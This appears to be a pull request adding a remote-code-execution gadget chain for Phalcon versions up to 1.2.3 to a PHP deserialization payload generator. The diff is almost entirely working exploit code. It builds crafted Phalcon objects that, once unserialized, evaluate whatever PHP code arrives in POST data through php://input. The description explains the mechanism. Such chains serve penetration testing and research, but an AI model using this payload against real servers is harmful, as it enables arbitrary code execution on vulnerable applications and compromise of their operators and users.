### PR TITLE
Add Phalcon < 1.2.3 RCE gadget chain

### DIFF
--- a/gadgetchains/Phalcon/RCE/1/chain.php
+++ b/gadgetchains/Phalcon/RCE/1/chain.php
@@ -1,0 +1,17 @@
+<?php
+
+namespace GadgetChain\Phalcon;
+
+class RCE extends \PHPGGC\GadgetChain\RCE
+{
+    public $version = '<= 1.2.3';
+    public $vector = '__wakeup';
+    public $author = 'Raz0r';
+    public $informations =  'This chain does not expect parameters, will eval()' .
+                            ' any code supplied in php://input (i.e. POST data)';
+
+    public function generate(array $parameters)
+    {
+        return new \Phalcon\Logger\Adapter\File();
+    }
+}

--- a/gadgetchains/Phalcon/RCE/1/gadgets.php
+++ b/gadgetchains/Phalcon/RCE/1/gadgets.php
@@ -1,0 +1,74 @@
+<?php
+
+namespace Phalcon\Di{
+  class Service {
+  	protected $_shared;
+  	protected $_definition;
+
+  	public function __construct() {
+  		$this->_shared = false;
+  		$this->_definition = array(
+  			'className' => '\Phalcon\Mvc\View\Engine\Php',
+  			'arguments' => array(array('type' => 'parameter', 'value' => 'test')),
+  			'calls' => array(
+  				array(
+  					'method' => 'render',
+  					'arguments' => array(
+  						array(
+  							'type' => 'parameter',
+  							'value' => 'php://input'
+  						), array(
+  							'type' => 'parameter',
+  							'value' => array()
+  							)
+  						)
+  					)
+  				)
+  			);
+  	}
+  }
+}
+
+namespace Phalcon {
+  class Di {
+  	protected $_services;
+
+  	public function __construct() {
+  		$this->_services = array('session' => new \Phalcon\Di\Service());
+  	}
+  }
+}
+
+namespace Phalcon\Http {
+  class Cookie {
+  	protected $_dependencyInjector;
+  	protected $_name = "test";
+  	protected $_expire = 0;
+  	protected $_httpOnly = 1;
+  	protected $_readed = true;
+  	protected $_restored = false;
+  	protected $_value = 'test';
+
+  	public function __construct() {
+  		$this->_dependencyInjector = new \Phalcon\Di();
+  	}
+  }
+}
+
+namespace Phalcon\Logger\Adapter {
+  class File {
+  	protected $_transaction;
+  	protected $_queue;
+  	protected $_formatter;
+  	protected $_logLevel;
+  	protected $_fileHandler;
+  	protected $_path;
+  	protected $_options;
+
+  	function __construct() {
+  		$this->_path = new \Phalcon\Http\Cookie("test");
+  	}
+  }
+}
+
+?>


### PR DESCRIPTION
This is an RCE gadget chain for Phalcon < 1.2.3 I found a while ago: https://raz0r.name/talks/confidence-2013-php-object-injection-revisited/. This chain will call `render` method on `\Phalcon\Mvc\View\Engine\Php` which will eval() the contents of a local file. I am using here `php://input`, so that any code in POST data will be evaluated. Please note that we cannot set payload via an argument to __construct(), so the chain does not expect parameters.